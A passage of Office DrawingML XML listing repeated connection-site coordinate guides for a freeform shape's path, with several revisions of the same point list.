              <a:gd name="connsiteY51" fmla="*/ 455936 h 1721151"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1721151"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1721151"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1721151"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1721151"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1721151"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1721151"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1721151"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1721151"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1721151"/>
              <a:gd name="connsiteX62" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1671666 h 1721151"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1671666 h 1704575"/>
              <a:gd name="connsiteX1" fmla="*/ 66313 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1704575 h 1704575"/>
              <a:gd name="connsiteX2" fmla="*/ 411216 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1628370 h 1704575"/>
              <a:gd name="connsiteX3" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1569826 h 1704575"/>
              <a:gd name="connsiteX4" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1522494 h 1704575"/>
              <a:gd name="connsiteX5" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1521861 h 1704575"/>
              <a:gd name="connsiteX6" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1494730 h 1704575"/>
              <a:gd name="connsiteX7" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1519061 h 1704575"/>
              <a:gd name="connsiteX8" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1513599 h 1704575"/>
              <a:gd name="connsiteX9" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1497764 h 1704575"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1464331 h 1704575"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1704575"/>
              <a:gd name="connsiteX12" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1388540 h 1704575"/>
              <a:gd name="connsiteX13" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1372736 h 1704575"/>
              <a:gd name="connsiteX14" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1341971 h 1704575"/>
              <a:gd name="connsiteX15" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1347156 h 1704575"/>
              <a:gd name="connsiteX16" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1323561 h 1704575"/>
              <a:gd name="connsiteX17" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1314224 h 1704575"/>
              <a:gd name="connsiteX18" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318186 h 1704575"/>
              <a:gd name="connsiteX19" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1318670 h 1704575"/>
              <a:gd name="connsiteX20" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1264183 h 1704575"/>
              <a:gd name="connsiteX21" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1236739 h 1704575"/>
              <a:gd name="connsiteX22" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1217421 h 1704575"/>
              <a:gd name="connsiteX23" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1241722 h 1704575"/>
              <a:gd name="connsiteX24" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1253751 h 1704575"/>
              <a:gd name="connsiteX25" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1263789 h 1704575"/>
              <a:gd name="connsiteX26" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1272939 h 1704575"/>
              <a:gd name="connsiteX27" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1294697 h 1704575"/>
              <a:gd name="connsiteX28" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1307786 h 1704575"/>
              <a:gd name="connsiteX29" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1303546 h 1704575"/>
              <a:gd name="connsiteX30" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1261726 h 1704575"/>
              <a:gd name="connsiteX31" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1265798 h 1704575"/>
              <a:gd name="connsiteX32" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1243899 h 1704575"/>
              <a:gd name="connsiteX33" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1204617 h 1704575"/>
              <a:gd name="connsiteX34" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1128278 h 1704575"/>
              <a:gd name="connsiteX35" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1091167 h 1704575"/>
              <a:gd name="connsiteX36" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051509 h 1704575"/>
              <a:gd name="connsiteX37" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1053037 h 1704575"/>
              <a:gd name="connsiteX38" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1051213 h 1704575"/>
              <a:gd name="connsiteX39" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1046878 h 1704575"/>
              <a:gd name="connsiteX40" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1043237 h 1704575"/>
              <a:gd name="connsiteX41" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1035396 h 1704575"/>
              <a:gd name="connsiteX42" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 1019019 h 1704575"/>
              <a:gd name="connsiteX43" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 985341 h 1704575"/>
              <a:gd name="connsiteX44" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 902062 h 1704575"/>
              <a:gd name="connsiteX45" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 846132 h 1704575"/>
              <a:gd name="connsiteX46" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 781877 h 1704575"/>
              <a:gd name="connsiteX47" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 699758 h 1704575"/>
              <a:gd name="connsiteX48" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 640778 h 1704575"/>
              <a:gd name="connsiteX49" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 593682 h 1704575"/>
              <a:gd name="connsiteX50" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 531129 h 1704575"/>
              <a:gd name="connsiteX51" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 455936 h 1704575"/>
              <a:gd name="connsiteX52" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 409302 h 1704575"/>
              <a:gd name="connsiteX53" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 259259 h 1704575"/>
              <a:gd name="connsiteX54" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 208471 h 1704575"/>
              <a:gd name="connsiteX55" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 161973 h 1704575"/>
              <a:gd name="connsiteX56" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 152111 h 1704575"/>
              <a:gd name="connsiteX57" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 112232 h 1704575"/>
              <a:gd name="connsiteX58" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 37171 h 1704575"/>
              <a:gd name="connsiteX59" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 24074 h 1704575"/>
              <a:gd name="connsiteX60" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1704575"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 0 h 1704575"/>
              <a:gd name="connsiteX62" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY62" fmla="*/ 1671666 h 1704575"/>
              <a:gd name="connsiteX0" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1671666 h 1785306"/>
              <a:gd name="connsiteX1" fmla="*/ 411216 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1628370 h 1785306"/>
              <a:gd name="connsiteX2" fmla="*/ 766051 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1569826 h 1785306"/>
              <a:gd name="connsiteX3" fmla="*/ 971617 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1522494 h 1785306"/>
              <a:gd name="connsiteX4" fmla="*/ 1186668 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1521861 h 1785306"/>
              <a:gd name="connsiteX5" fmla="*/ 1339078 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1494730 h 1785306"/>
              <a:gd name="connsiteX6" fmla="*/ 1492452 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1519061 h 1785306"/>
              <a:gd name="connsiteX7" fmla="*/ 1604999 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1513599 h 1785306"/>
              <a:gd name="connsiteX8" fmla="*/ 1717911 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1497764 h 1785306"/>
              <a:gd name="connsiteX9" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1464331 h 1785306"/>
              <a:gd name="connsiteX10" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1409907 h 1785306"/>
              <a:gd name="connsiteX11" fmla="*/ 2244830 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1388540 h 1785306"/>
              <a:gd name="connsiteX12" fmla="*/ 2428648 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1372736 h 1785306"/>
              <a:gd name="connsiteX13" fmla="*/ 2645882 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1341971 h 1785306"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1347156 h 1785306"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1785306"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1785306"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1785306"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1785306"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1785306"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1785306"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1785306"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1785306"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1785306"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1785306"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1785306"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1785306"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1785306"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1785306"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1785306"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1785306"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1785306"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1785306"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1785306"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1785306"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1785306"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1785306"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1785306"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1785306"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1785306"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1785306"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1785306"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1785306"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1785306"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1785306"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1785306"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1785306"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1785306"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1785306"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1785306"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1785306"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1785306"/>
              <a:gd name="connsiteX52" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 259259 h 1785306"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1785306"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1785306"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1785306"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1785306"/>
              <a:gd name="connsiteX57" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 37171 h 1785306"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1785306"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1785306"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1785306"/>
              <a:gd name="connsiteX61" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1671666 h 1785306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352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1686480"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1686480"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421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190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX61" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY61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352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1686480"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1686480"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421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230008 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1303546 h 1686480"/>
              <a:gd name="connsiteX28" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1261726 h 1686480"/>
              <a:gd name="connsiteX29" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1265798 h 1686480"/>
              <a:gd name="connsiteX30" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1243899 h 1686480"/>
              <a:gd name="connsiteX31" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1204617 h 1686480"/>
              <a:gd name="connsiteX32" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1128278 h 1686480"/>
              <a:gd name="connsiteX33" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1091167 h 1686480"/>
              <a:gd name="connsiteX34" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1051509 h 1686480"/>
              <a:gd name="connsiteX35" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1053037 h 1686480"/>
              <a:gd name="connsiteX36" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1051213 h 1686480"/>
              <a:gd name="connsiteX37" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1046878 h 1686480"/>
              <a:gd name="connsiteX38" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1043237 h 1686480"/>
              <a:gd name="connsiteX39" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1035396 h 1686480"/>
              <a:gd name="connsiteX40" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1019019 h 1686480"/>
              <a:gd name="connsiteX41" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 985341 h 1686480"/>
              <a:gd name="connsiteX42" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 902062 h 1686480"/>
              <a:gd name="connsiteX43" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 846132 h 1686480"/>
              <a:gd name="connsiteX44" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 781877 h 1686480"/>
              <a:gd name="connsiteX45" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 699758 h 1686480"/>
              <a:gd name="connsiteX46" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 640778 h 1686480"/>
              <a:gd name="connsiteX47" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 593682 h 1686480"/>
              <a:gd name="connsiteX48" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 531129 h 1686480"/>
              <a:gd name="connsiteX49" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 455936 h 1686480"/>
              <a:gd name="connsiteX50" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 409302 h 1686480"/>
              <a:gd name="connsiteX51" fmla="*/ 8231938 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 259259 h 1686480"/>
              <a:gd name="connsiteX52" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 208471 h 1686480"/>
              <a:gd name="connsiteX53" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 161973 h 1686480"/>
              <a:gd name="connsiteX54" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 152111 h 1686480"/>
              <a:gd name="connsiteX55" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 112232 h 1686480"/>
              <a:gd name="connsiteX56" fmla="*/ 9182272 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 37171 h 1686480"/>
              <a:gd name="connsiteX57" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 24074 h 1686480"/>
              <a:gd name="connsiteX58" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX59" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1686480"/>
              <a:gd name="connsiteX60" fmla="*/ 8158 w 9288370"/>
              <a:gd name="connsiteY60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352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1686480"/>
